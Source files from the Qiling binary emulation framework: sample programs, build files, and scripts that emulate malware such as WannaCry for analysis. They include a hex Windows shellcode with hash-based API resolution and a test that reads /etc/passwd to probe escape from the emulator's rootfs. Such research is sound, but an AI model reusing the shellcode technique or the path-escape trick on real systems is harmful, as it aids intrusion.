https://raw.githubusercontent.com/qilingframework/qiling/a430518ef2026c3fa9d69df5831581b9ac3aa368/examples/shellcodes/win64_ob_msg_box_x64.bin -------------------------------------------------------------------------------- /examples/shellcodes/win64_ob_msg_box_x64.hex: -------------------------------------------------------------------------------- 1 | \xfc\x48\x81\xe4\xf0\xff\xff\xff\xe8\xd0\x00\x00\x00\x41\x51\x41\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x3e\x48\x8b\x52\x18\x3e\x48\x8b\x52\x20\x3e\x48\x8b\x72\x50\x3e\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52\x41\x51\x3e\x48\x8b\x52\x20\x3e\x8b\x42\x3c\x48\x01\xd0\x3e\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x6f\x48\x01\xd0\x50\x3e\x8b\x48\x18\x3e\x44\x8b\x40\x20\x49\x01\xd0\xe3\x5c\x48\xff\xc9\x3e\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x3e\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd6\x58\x3e\x44\x8b\x40\x24\x49\x01\xd0\x66\x3e\x41\x8b\x0c\x48\x3e\x44\x8b\x40\x1c\x49\x01\xd0\x3e\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x3e\x48\x8b\x12\xe9\x49\xff\xff\xff\x5d\x49\xc7\xc1\x00\x00\x00\x00\x3e\x48\x8d\x95\xfe\x00\x00\x00\x3e\x4c\x8d\x85\x0f\x01\x00\x00\x48\x31\xc9\x41\xba\x45\x83\x56\x07\xff\xd5\x48\x31\xc9\x41\xba\xf0\xb5\xa2\x56\xff\xd5\x48\x65\x6c\x6c\x6f\x2c\x20\x66\x72\x6f\x6d\x20\x4d\x53\x46\x21\x00\x4d\x65\x73\x73\x61\x67\x65\x42\x6f\x78\x00 -------------------------------------------------------------------------------- /examples/src/freebsd/Makefile: -------------------------------------------------------------------------------- 1 | CC = gcc 2 | 3 | CFLAGS = -Wall -O2 -s 4 | 5 | #CFLAGS += -DDEBUG 6 | 7 | OBJS = $(patsubst %.c,%.o,$(wildcard *.c)) 8 | 9 | DEPS = $(patsubst %.o,%.d,$(OBJS)) 10 | CFLAGS += -MD 11 | MISSING_DEPS = $(filter-out $(wildcard $(DEPS)),$(DEPS)) 12 | MISSING_DEPS_SOURCES = $(wildcard $(patsubst %.d,%.c,$(MISSING_DEPS))) 13 | 14 | LIBS= 15 | 16 | TARGET = x8664_hello x8664_hello_static 17 | 18 | all : $(TARGET) 19 | 20 | ifneq ($(MISSING_DEPS),) 21 | $(MISSING_DEPS) : 22 | @$(RM) $(patsubst %.d,%.o,$@) 23 | endif 24 | 25 | -include $(DEPS) 26 | 27 | x8664_hello: hello.c 28 | gcc -Wall -O2 -s $< -o $@ 29 | 30 | x8664_hello_static: hello.c 31 | gcc -Wall -O2 -s -static $< -o $@ 32 | 33 | $(OBJS):%.o:%.c 34 | $(CC) $(CFLAGS) -c $< -o $@ 35 | 36 | clean: 37 | rm -f *.d *.s *.o $(TARGET) 38 | -------------------------------------------------------------------------------- /examples/src/freebsd/README: -------------------------------------------------------------------------------- 1 | This is the source code of all the hello binaries. 2 | Makefile would build hello for all architectures. 3 | 4 | ./rootfs/x8664_freebsd/bin/x8664_hello 5 | ./rootfs/x8664_freebsd/bin/x8664_hello_static -------------------------------------------------------------------------------- /examples/src/freebsd/hello.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | int main(int argc, const char **argv) 7 | { 8 | printf("Hello, World!\n"); 9 | 10 | return 0; 11 | } 12 | -------------------------------------------------------------------------------- /examples/src/linux/README: -------------------------------------------------------------------------------- 1 | This is the source code of all the hello binaries. 2 | Makefile would build hello for all architectures. 3 | 4 | ./rootfs/arm64_linux/bin/arm64_hello 5 | ./rootfs/arm64_linux/bin/arm64_hello_static 6 | ./rootfs/arm_linux/bin/arm_hello 7 | ./rootfs/arm_linux/bin/arm_hello_static 8 | ./rootfs/mips32el_linux/bin/mips32el_hello 9 | ./rootfs/mips32el_linux/bin/mips32el_hello_static 10 | ./rootfs/x8664_linux/bin/x8664_hello 11 | ./rootfs/x8664_linux/bin/x8664_hello_static 12 | ./rootfs/x86_linux/bin/x86_hello 13 | ./rootfs/x86_linux/bin/x86_hello_static 14 | 15 | -------------------------------------------------------------------------------- /examples/src/linux/absolutepath.c: -------------------------------------------------------------------------------- 1 | // Modified from https://github.com/qilingframework/qiling/issues/484 2 | #include 3 | #include 4 | #include 5 | 6 | void read_and_print(){ 7 | char data[4096]; 8 | FILE* f = fopen("/absolutepath_test.txt", "r"); 9 | int count = fread(data, 1, 4096, f); 10 | fclose(f); 11 | data[count] = 0; 12 | printf("%s\n", data); 13 | } 14 | 15 | int main() { 16 | read_and_print(); 17 | chdir("/lib"); 18 | read_and_print(); 19 | return 0; 20 | } 21 | -------------------------------------------------------------------------------- /examples/src/linux/armeb_hello: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/qilingframework/qiling/a430518ef2026c3fa9d69df5831581b9ac3aa368/examples/src/linux/armeb_hello -------------------------------------------------------------------------------- /examples/src/linux/armeb_hello_static: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/qilingframework/qiling/a430518ef2026c3fa9d69df5831581b9ac3aa368/examples/src/linux/armeb_hello_static -------------------------------------------------------------------------------- /examples/src/linux/armeb_multithreading: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/qilingframework/qiling/a430518ef2026c3fa9d69df5831581b9ac3aa368/examples/src/linux/armeb_multithreading -------------------------------------------------------------------------------- /examples/src/linux/armeb_puts: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/qilingframework/qiling/a430518ef2026c3fa9d69df5831581b9ac3aa368/examples/src/linux/armeb_puts -------------------------------------------------------------------------------- /examples/src/linux/armeb_tcp_test: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/qilingframework/qiling/a430518ef2026c3fa9d69df5831581b9ac3aa368/examples/src/linux/armeb_tcp_test -------------------------------------------------------------------------------- /examples/src/linux/armeb_udp_test: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/qilingframework/qiling/a430518ef2026c3fa9d69df5831581b9ac3aa368/examples/src/linux/armeb_udp_test -------------------------------------------------------------------------------- /examples/src/linux/cwd.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | void print_cwd(){ 6 | char buf[4096]; 7 | getcwd(buf, 4096); 8 | printf("%s\n", buf); 9 | } 10 | 11 | int main(){ 12 | print_cwd(); 13 | // Firstly, we chdir by relative path. 14 | chdir("lib"); 15 | print_cwd(); 16 | // Then, by absolute path. 17 | chdir("/bin"); 18 | print_cwd(); 19 | // Last, test rootfs. 20 | chdir("/"); 21 | print_cwd(); 22 | return 0; 23 | } 24 | -------------------------------------------------------------------------------- /examples/src/linux/fetch_urandom.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main(void) { 4 | FILE *fp; 5 | int randno; 6 | 7 | if ((fp = fopen("/dev/urandom", "r")) == NULL) { 8 | fprintf(stderr, "Error! Could not open /dev/urandom for read\n"); 9 | return -1; 10 | } 11 | 12 | randno = fgetc(fp); 13 | printf("randno: %d\n", randno); 14 | fclose(fp); 15 | 16 | return 0; 17 | } 18 | 19 | -------------------------------------------------------------------------------- /examples/src/linux/fetch_urandom_multiple_times.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main(void) { 4 | FILE *fp; 5 | int randno; 6 | for(int i=0;i<5;i++){ 7 | if ((fp = fopen("/dev/urandom", "r")) == NULL) { 8 | fprintf(stderr, "Error! Could not open /dev/urandom for read\n"); 9 | return -1; 10 | } 11 | 12 | randno = fgetc(fp); 13 | printf("randno: %d\n", randno); 14 | fclose(fp); 15 | } 16 | 17 | return 0; 18 | } 19 | 20 | 21 | -------------------------------------------------------------------------------- /examples/src/linux/getdents.c: -------------------------------------------------------------------------------- 1 | #include "stdio.h" 2 | #include 3 | #include 4 | void main() 5 | { 6 | //int aa = O_RDONLY|O_NDELAY|O_DIRECTORY|O_LARGEFILE|O_CLOEXEC; 7 | DIR *dirptr = NULL; 8 | struct dirent *ptr; 9 | dirptr = opendir("/"); 10 | 11 | while ((ptr = readdir(dirptr)) != NULL) 12 | { 13 | printf("%s\n", ptr->d_name); 14 | } 15 | 16 | if (dirptr == NULL) 17 | { 18 | printf("Open dir error !\n"); 19 | } 20 | else 21 | printf("Open Success!\n"); 22 | close(dirptr); 23 | } -------------------------------------------------------------------------------- /examples/src/linux/hello.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | int main(int argc, const char **argv) 7 | { 8 | printf("Hello, World!\n"); 9 | 10 | return 0; 11 | } 12 | -------------------------------------------------------------------------------- /examples/src/linux/hello.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main(int argc, const char** argv) 4 | { 5 | std::cout << "Hello, World!" << std::endl; 6 | 7 | return 0; 8 | } 9 | -------------------------------------------------------------------------------- /examples/src/linux/hello_mips32.s: -------------------------------------------------------------------------------- 1 | .data 2 | mystring: .asciiz "Hello World!\n" 3 | .text 4 | .global __start 5 | __start: 6 | li $a0, 0 7 | la $a1, mystring 8 | li $a2, 13 9 | li $v0, 4004 10 | syscall 11 | li $a0, 3 12 | li $v0, 4001 13 | syscall 14 | 15 | # as hello_mips32.s -o hello_mips32.o 16 | # ld hello_mips32.o -o hello_mips32 17 | -------------------------------------------------------------------------------- /examples/src/linux/hello_riscv.s: -------------------------------------------------------------------------------- 1 | # riscv${bit}-unknown-elf-as hello_riscv.s -o hello_riscv.o 2 | # riscv${bit}-unknown-elf-ld hello_riscv.o -o hello_riscv 3 | 4 | .global _start 5 | 6 | _start: addi a0, x0, 1 7 | la a1, helloriscv 8 | addi a2, x0, 13 9 | addi a7, x0, 64 10 | ecall 11 | addi a0, x0, 0 12 | addi a7, x0, 93 13 | ecall 14 | 15 | .data 16 | helloriscv: .ascii "Hello RISCV!\n" 17 | -------------------------------------------------------------------------------- /examples/src/linux/mem_invalid_access.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | void test_write(){ 4 | char * ptr = 0xaabbccdd; 5 | *ptr = 'W'; 6 | printf("%c", *ptr); 7 | } 8 | 9 | void test_read(){ 10 | char * ptr = 0xbbccddee; 11 | printf("%c", *ptr); 12 | } 13 | 14 | int main(){ 15 | test_write(); 16 | test_read(); 17 | return 0; 18 | } -------------------------------------------------------------------------------- /examples/src/linux/multithreading.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | // thread 1 6 | void thread_1(void) { 7 | int i = 0; 8 | for(i = 0; i <= 6; i++) { 9 | printf("This is a pthread_1.\n"); 10 | if(i == 2) { 11 | pthread_exit(3); 12 | return 3; 13 | } 14 | sleep(1); 15 | } 16 | } 17 | 18 | // thread 2 19 | void thread_2(void) { 20 | int i; 21 | for(i = 0; i < 3; i++) { 22 | printf("This is a pthread_2.\n"); 23 | } 24 | pthread_exit(2); 25 | return 2; 26 | } 27 | 28 | int main(void) { 29 | pthread_t id_1, id_2; 30 | int ret; 31 | 32 | /*Create pthread 1*/ 33 | ret=pthread_create(&id_1, NULL, (void *) thread_1, NULL); 34 | if(ret != 0) { 35 | printf("Create pthread error!\n"); 36 | return -1; 37 | } 38 | 39 | /*Create pthread 2*/ 40 | ret=pthread_create(&id_2, NULL, (void *) thread_2, NULL); 41 | if(ret != 0) { 42 | printf("Create pthread error!\n"); 43 | return -1; 44 | } 45 | 46 | /*wait thread ending*/ 47 | pthread_join(id_1, &ret); 48 | printf("thread 1 ret val is : %d\n", ret); 49 | pthread_join(id_2, &ret); 50 | printf("thread 2 ret val is : %d\n", ret); 51 | return 0; 52 | } -------------------------------------------------------------------------------- /examples/src/linux/patch_test.bin.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #include "patch_test.so.h" 4 | 5 | int main(int argc, const char **argv) 6 | { 7 | const char* p = patch_test_value; 8 | 9 | if (strcmp(p, "qiling")) 10 | { 11 | /* crash with an illegal instruction */ 12 | __builtin_trap(); 13 | } 14 | 15 | return 0; 16 | } 17 | 18 | // run: 19 | // LD_LIBRARY_PATH=. ./patch_test.bin -------------------------------------------------------------------------------- /examples/src/linux/patch_test.so.c: -------------------------------------------------------------------------------- 1 | 2 | const char *patch_test_value = "gniliq"; 3 | -------------------------------------------------------------------------------- /examples/src/linux/patch_test.so.h: -------------------------------------------------------------------------------- 1 | #ifndef _PATCH_TEST_SO_H 2 | #define _PATCH_TEST_SO_H 3 | 4 | extern const char *patch_test_value; 5 | 6 | #endif 7 | -------------------------------------------------------------------------------- /examples/src/linux/path_traverse.c: -------------------------------------------------------------------------------- 1 | // gcc -static ~/qiling/examples/src/linux/path_traverse.c -g -O0 -o ~/qiling/examples/rootfs/x8664_linux/bin/path_traverse_static 2 | // https://www.kalmarunionen.dk/writeups/2022/rwctf/qlaas/ 3 | #include 4 | #include 5 | 6 | int main(){ 7 | char buf[4096]; 8 | int fd = openat(1, "/etc/passwd", O_RDONLY); 9 | ssize_t len = read(fd, buf, sizeof(buf)); 10 | write(1, buf, len); 11 | 12 | fd = openat(1, "/etc/passwd_link", O_RDONLY); 13 | len = read(fd, buf, sizeof(buf)); 14 | write(1, buf, len); 15 | } 16 | -------------------------------------------------------------------------------- /examples/src/linux/picohttpd/Makefile: -------------------------------------------------------------------------------- 1 | all: x64_server arm_server 2 | 3 | clean: 4 | @rm -rf *.o 5 | @rm -rf x64_server 6 | @rm -rf arm_server 7 | 8 | x64_server: main.o httpd.o 9 | gcc -o x64_server $^ 10 | @rm -rf *.o 11 | 12 | x64_main.o: main.c httpd.h 13 | gcc -c -o x64_main.o main.c 14 | 15 | x64_httpd.o: httpd.c httpd.h 16 | gcc -c -o x64_httpd.o httpd.c 17 | 18 | arm_server: arm_main.o arm_httpd.o 19 | arm-linux-gnueabi-gcc-10 -o arm_server $^ 20 | @rm -rf *.o 21 | 22 | arm_main.o: main.c httpd.h 23 | arm-linux-gnueabi-gcc-10 -c -o arm_main.o main.c 24 | 25 | arm_httpd.o: httpd.c httpd.h 26 | arm-linux-gnueabi-gcc-10 -c -o arm_httpd.o httpd.c -------------------------------------------------------------------------------- /examples/src/linux/picohttpd/httpd.h: -------------------------------------------------------------------------------- 1 | #ifndef _HTTPD_H___ 2 | #define _HTTPD_H___ 3 | 4 | #include 5 | #include 6 | 7 | //Server control functions 8 | 9 | void serve_forever(const char *PORT); 10 | 11 | // Client request 12 | 13 | extern char *method, // "GET" or "POST" 14 | *uri, // "/index.html" things before '?' 15 | *qs, // "a=1&b=2" things after '?' 16 | *prot; // "HTTP/1.1" 17 | 18 | extern char *payload; // for POST 19 | extern int payload_size; 20 | 21 | char *request_header(const char* name); 22 | 23 | // user shall implement this function 24 | 25 | void route(); 26 | 27 | // some interesting macro for `route()` 28 | #define ROUTE_START() if (0) { 29 | #define ROUTE(METHOD,URI) } else if (strcmp(URI,uri)==0&&strcmp(METHOD,method)==0) { 30 | #define ROUTE_GET(URI) ROUTE("GET", URI) 31 | #define ROUTE_POST(URI) ROUTE("POST", URI) 32 | #define ROUTE_END() } else printf(\ 33 | "HTTP/1.1 500 Not Handled\r\n\r\n" \ 34 | "The server has no handler to the request.\r\n" \ 35 | ); 36 | 37 | #endif 38 | -------------------------------------------------------------------------------- /examples/src/linux/picohttpd/main.c: -------------------------------------------------------------------------------- 1 | #include "httpd.h" 2 | 3 | #define PORT_DEFAULT "12913" 4 | 5 | int main(int argc, const char **argv) 6 | { 7 | const char *PORT; 8 | 9 | if (argc < 2) { 10 | PORT = PORT_DEFAULT; 11 | } else { 12 | PORT = argv[1]; 13 | } 14 | 15 | fprintf(stderr, "port is %s.\n", PORT); 16 | 17 | serve_forever(PORT); 18 | return 0; 19 | } 20 | 21 | void route() 22 | { 23 | ROUTE_START() 24 | 25 | ROUTE_GET("/") 26 | { 27 | printf("HTTP/1.1 200 OK\r\n\r\n"); 28 | printf("httpd_test_successful"); 29 | } 30 | 31 | ROUTE_POST("/") 32 | { 33 | printf("HTTP/1.1 200 OK\r\n\r\n"); 34 | printf("Wow, seems that you POSTed %d bytes. \r\n", payload_size); 35 | printf("Fetch the data using `payload` variable."); 36 | } 37 | 38 | ROUTE_END() 39 | } 40 | -------------------------------------------------------------------------------- /examples/src/linux/picohttpd/picohttpd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/qilingframework/qiling/a430518ef2026c3fa9d69df5831581b9ac3aa368/examples/src/linux/picohttpd/picohttpd -------------------------------------------------------------------------------- /examples/src/linux/picohttpd/readme.txt: -------------------------------------------------------------------------------- 1 | copy from: https://gist.github.com/laobubu/d6d0e9beb934b60b2e552c2d03e1409e 2 | 3 | compile armeb with https://crosstool-ng.github.io/docs/internals/ , with linux kernel 4 | -------------------------------------------------------------------------------- /examples/src/linux/posix_syscall_execve.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | char *args[] = {"child", "arg1", "arg2", NULL}; 6 | char *env[] = {"QL_TEST=TEST_QUERY", NULL}; 7 | 8 | int main(int argc, const char **argv) { 9 | execve("bin/x8664_hello_static", args, env); 10 | return -1; 11 | } 12 | -------------------------------------------------------------------------------- /examples/src/linux/puts.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main() 5 | { 6 | puts("CCCC"); 7 | return 0; 8 | } 9 | -------------------------------------------------------------------------------- /examples/src/linux/sleep_hello.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | void func_hello() 7 | { 8 | printf("Hello, World!\n"); 9 | 10 | return; 11 | } 12 | 13 | int main(int argc, const char **argv) 14 | { 15 | printf("sleep 3600 seconds...\n"); 16 | sleep(3600); 17 | printf("wake up.\n"); 18 | 19 | func_hello(); 20 | 21 | return 0; 22 | } 23 | -------------------------------------------------------------------------------- /examples/src/macos/README: -------------------------------------------------------------------------------- 1 | gcc -m32 helloworld.c -o test 2 | 3 | gcc -m64 helloworld.c -o test64 4 | -------------------------------------------------------------------------------- /examples/src/macos/helloworld.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main() 4 | { 5 | printf("Hello world\n"); 6 | return 0; 7 | } 8 | 9 | -------------------------------------------------------------------------------- /examples/src/macos/x8664_hello.asm: -------------------------------------------------------------------------------- 1 | ; /usr/local/bin/nasm -f macho64 64.asm && ld -macmacos_version_min 10.7.0 -lSystem -o 64 64.o && ./64 2 | 3 | global start 4 | 5 | 6 | section .text 7 | 8 | start: 9 | mov rax, 0x2000004 ; write 10 | mov rdi, 1 ; stdout 11 | mov rsi, msg 12 | mov rdx, msg.len 13 | syscall 14 | 15 | mov rax, 0x2000001 ; exit 16 | mov rdi, 0 17 | syscall 18 | 19 | 20 | section .data 21 | 22 | msg: db "Hello, world!", 10 23 | .len: equ $ - msg 24 | -------------------------------------------------------------------------------- /examples/src/macos/x86_hello.asm: -------------------------------------------------------------------------------- 1 | ; /usr/local/bin/nasm -f macho 32.asm && ld -macmacos_version_min 10.7.0 -o 32 32.o && ./32 2 | 3 | global start 4 | 5 | section .text 6 | start: 7 | push dword msg.len 8 | push dword msg 9 | push dword 1 10 | mov eax, 4 11 | sub esp, 4 12 | int 0x80 13 | add esp, 16 14 | 15 | push dword 0 16 | mov eax, 1 17 | sub esp, 12 18 | int 0x80 19 | 20 | section .data 21 | 22 | msg: db "Hello, world!", 10 23 | .len: equ $ - msg 24 | -------------------------------------------------------------------------------- /examples/src/qnx/Makefile: -------------------------------------------------------------------------------- 1 | all: hello 2 | 3 | hello: hello.c 4 | qcc -V gcc_ntoarmv7le hello.c -o hello 5 | 6 | clean: 7 | rm -rf hello 8 | -------------------------------------------------------------------------------- /examples/src/qnx/README: -------------------------------------------------------------------------------- 1 | This is the source code of all the hello binaries. 2 | Makefile would build hello for all architectures. 3 | 4 | ./rootfs/arm_qnx/bin/hello 5 | 6 | Note that non-free QNX Software Development Platform 7 | is required to compile the binary. 8 | -------------------------------------------------------------------------------- /examples/src/qnx/hello.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | void atexit_func(void) 5 | { 6 | printf("atexit\n"); 7 | } 8 | 9 | int main(int argc, char** argv, char** envp) 10 | { 11 | int i = 0; 12 | 13 | atexit(atexit_func); 14 | 15 | printf("Hello, Qiling! argc=%d\n", argc); 16 | for (i = 0; i < argc; i++) { 17 | printf("argv[%d] = '%s'\n", i, argv[i]); 18 | } 19 | 20 | for (i = 0; envp[i] != NULL; i++) { 21 | printf("env[%d] = '%s'\n", i, envp[i]); 22 | } 23 | return 0; 24 | } 25 | -------------------------------------------------------------------------------- /examples/src/qnx/hellosqrt.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int main(int argc, char **argv) 5 | { 6 | double a = atan(1.0); 7 | double b = sin(a); 8 | double c = 1.0 / b; 9 | printf("hello, sqrt(2) = %lf\n", c); 10 | return 0; 11 | } 12 | -------------------------------------------------------------------------------- /examples/src/windows/MultiThread.c: -------------------------------------------------------------------------------- 1 | #include "stdafx.h" 2 | #include 3 | #include 4 | #include 5 | 6 | 7 | DWORD WINAPI ThreadFun(LPVOID pM) 8 | { 9 | char *test = (char *)pM; 10 | printf(test); 11 | printf("child tread: thread id is %d\n", GetCurrentThreadId()); 12 | return 0; 13 | } 14 | 15 | int main() 16 | { 17 | printf("main thread\n"); 18 | char test[] = "child thread\n"; 19 | DWORD threadId = 0; 20 | HANDLE handle = CreateThread(NULL, 0, ThreadFun, (LPVOID)test, 0, &threadId); 21 | printf("main thread: child thread id is %d\n", threadId); 22 | WaitForSingleObject(handle, INFINITE); 23 | CloseHandle(handle); 24 | return 0; 25 | } -------------------------------------------------------------------------------- /examples/src/windows/README: -------------------------------------------------------------------------------- 1 | This is the source code of all the hello binaries. 2 | Makefile would build hello for all architectures. 3 | 4 | ./rootfs/x8664_windows/bin/x8664-windows-hello.exe 5 | ./rootfs/x86_windows/bin/x86-windows-hello.exe 6 | -------------------------------------------------------------------------------- /examples/src/windows/argv.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main(int argc, char* argv[]) 4 | { 5 | puts("test argc & argv"); 6 | printf("argc: %d\n", argc); 7 | for (int i = 0; i < argc; i++) { 8 | printf("argv[%d]: %s\n", i, argv[i]); 9 | } 10 | return 0; 11 | } 12 | -------------------------------------------------------------------------------- /examples/src/windows/cmdln.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | // These definitions are wrong, but tcc does not properly read them otherwise! 5 | extern char** _acmdln; 6 | extern wchar_t** _wcmdln; 7 | 8 | extern 9 | char **__p__acmdln(void); 10 | extern 11 | wchar_t **__p__wcmdln(void); 12 | 13 | int main(int argc, char* argv[]) 14 | { 15 | int i; 16 | for (i = 0; i < argc; ++i) 17 | { 18 | printf("arg[%i]: <%s>\n", i, argv[i]); 19 | } 20 | 21 | printf("_acmdln: <%s>\n", *_acmdln); 22 | wprintf(L"_wcmdln: <%s>\n", *_wcmdln); 23 | 24 | #if !defined(_WIN64) 25 | // Not present on x64 msvcrt.dll 26 | printf("__p__acmdln: <%s>\n", *__p__acmdln()); 27 | wprintf(L"__p__wcmdln: <%s>\n", *__p__wcmdln()); 28 | #endif 29 | 30 | printf("GetCommandLineA: <%s>\n", GetCommandLineA()); 31 | wprintf(L"GetCommandLineW: <%s>\n", GetCommandLineW()); 32 | 33 | return 0; 34 | } 35 | -------------------------------------------------------------------------------- /examples/src/windows/file_upx.c: -------------------------------------------------------------------------------- 1 | #include 2 | int main() 3 | { 4 | FILE *f; 5 | const char *filename = "test.bin"; 6 | unsigned char buf[5] = {1, 2, 3, 4, 5}; 7 | f = fopen(filename, "wb"); 8 | fwrite(buf, 1, 5, f); 9 | fclose(f); 10 | f = fopen(filename, "rb"); 11 | fread(buf, 1, 5, f); 12 | fclose(f); 13 | remove(filename); 14 | return 0; 15 | } 16 | -------------------------------------------------------------------------------- /examples/src/windows/hello.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | 6 | int main(int argc, const char **argv) 7 | { 8 | printf("Hello, World!\n"); 9 | 10 | return 0; 11 | } 12 | -------------------------------------------------------------------------------- /examples/src/windows/return_main.c: -------------------------------------------------------------------------------- 1 | /* 2 | Build with tcc (https://download.savannah.gnu.org/releases/tinycc/) 3 | Renamed 64 bit tcc to 'tcc64' for convenience: 4 | 5 | tcc return_main.c -nostdlib -o return_main32.exe 6 | tcc64 return_main.c -nostdlib -o return_main64.exe 7 | */ 8 | 9 | int _start() 10 | { 11 | return 0; 12 | } 13 | -------------------------------------------------------------------------------- /examples/uboot_bin.ql: -------------------------------------------------------------------------------- 1 | [CODE] 2 | ram_size = 0xa00000 3 | entry_point = 0x80800000 4 | heap_size = 0x300000 5 | 6 | 7 | [MISC] 8 | current_path = / 9 | -------------------------------------------------------------------------------- /examples/uselessdisk_x86_windows.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import sys 7 | sys.path.append("..") 8 | 9 | from qiling import Qiling 10 | from qiling.const import QL_VERBOSE 11 | 12 | if __name__ == "__main__": 13 | ql = Qiling(["rootfs/x86_windows/bin/UselessDisk.bin"], "rootfs/x86_windows", verbose=QL_VERBOSE.DEBUG) 14 | ql.run() 15 | -------------------------------------------------------------------------------- /examples/wannacry_x86_windows_hookaddress.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | import sys 7 | sys.path.append("..") 8 | 9 | from qiling import Qiling 10 | from qiling.const import QL_VERBOSE 11 | 12 | def stopatkillerswtich(ql: Qiling): 13 | print(f'killerswtch found') 14 | ql.emu_stop() 15 | 16 | if __name__ == "__main__": 17 | ql = Qiling(["rootfs/x86_windows/bin/wannacry.bin"], "rootfs/x86_windows", verbose=QL_VERBOSE.DEBUG) 18 | ql.hook_address(stopatkillerswtich, 0x40819a) 19 | ql.run() 20 | -------------------------------------------------------------------------------- /qiling/__init__.py: -------------------------------------------------------------------------------- 1 | import importlib.metadata 2 | from .core import Qiling 3 | 4 | try: 5 | __version__ = importlib.metadata.version(__package__ or __name__) 6 | except importlib.metadata.PackageNotFoundError: 7 | __version__ = "0.0.0" 8 | 9 | __all__ = ['Qiling'] 10 | -------------------------------------------------------------------------------- /qiling/arch/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/qilingframework/qiling/a430518ef2026c3fa9d69df5831581b9ac3aa368/qiling/arch/__init__.py -------------------------------------------------------------------------------- /qiling/arch/msr.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | # 5 | 6 | from __future__ import annotations 7 | 8 | import weakref 9 | 10 | from typing import TYPE_CHECKING 11 | 12 | if TYPE_CHECKING: 13 | from unicorn import Uc 14 | 15 | 16 | class QlMsrManager: 17 | """Enables access to Intel MSR. 18 | """ 19 | 20 | def __init__(self, uc: Uc) -> None: 21 | self.uc: Uc = weakref.proxy(uc) 22 | 23 | def read(self, msr: int) -> int: 24 | """Read a model-specific register value. 25 | """ 26 | 27 | return self.uc.msr_read(msr) 28 | 29 | def write(self, msr: int, value: int): 30 | """Write a model-specific register value. 31 | """ 32 | 33 | self.uc.msr_write(msr, value) 34 | -------------------------------------------------------------------------------- /qiling/cc/arm.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | # 3 | # Cross Platform and Multi Architecture Advanced Binary Emulation Framework 4 | 5 | from unicorn.arm_const import UC_ARM_REG_R0, UC_ARM_REG_R1, UC_ARM_REG_R2, UC_ARM_REG_R3 6 | from unicorn.arm64_const import ( 7 | UC_ARM64_REG_X0, UC_ARM64_REG_X1, UC_ARM64_REG_X2, UC_ARM64_REG_X3, 8 | UC_ARM64_REG_X4, UC_ARM64_REG_X5, UC_ARM64_REG_X6, UC_ARM64_REG_X7 9 | ) 10 | 11 | from qiling.cc import QlCommonBaseCC, make_arg_list 12 | 13 | class QlArmBaseCC(QlCommonBaseCC): 14 | """Calling convention base class for ARM-based systems. 15 | Supports arguments passing over registers and stack. 16 | """ 17 | 18 | _retaddr_on_stack = False 19 | 20 | @staticmethod 21 | def getNumSlots(argbits: int) -> int: 22 | return 1 23 | 24 | def setReturnAddress(self, addr: int) -> None: 25 | self.arch.regs.lr = addr 26 | 27 | def unwind(self, nslots: int) -> int: 28 | # TODO: cleanup? 29 | return self.arch.regs.lr 30 | 31 | class aarch64(QlArmBaseCC): 32 | _retreg = UC_ARM64_REG_X0 33 | _argregs = make_arg_list(UC_ARM64_REG_X0, UC_ARM64_REG_X1, UC_ARM64_REG_X2, UC_ARM64_REG_X3, UC_ARM64_REG_X4, UC_ARM64_REG_X5, UC_ARM64_REG_X6, UC_ARM64_REG_X7) 34 | 35 | class aarch32(QlArmBaseCC): 36 | _retreg = UC_ARM_REG_R0 37 | _argregs = make_arg_list(UC_ARM_REG_R0, UC_ARM_REG_R1, UC_ARM_REG_R2, UC_ARM_REG_R3) 38 | -------------------------------------------------------------------------------- /qiling/cc/mips.py: -------------------------------------------------------------------------------- 1 | 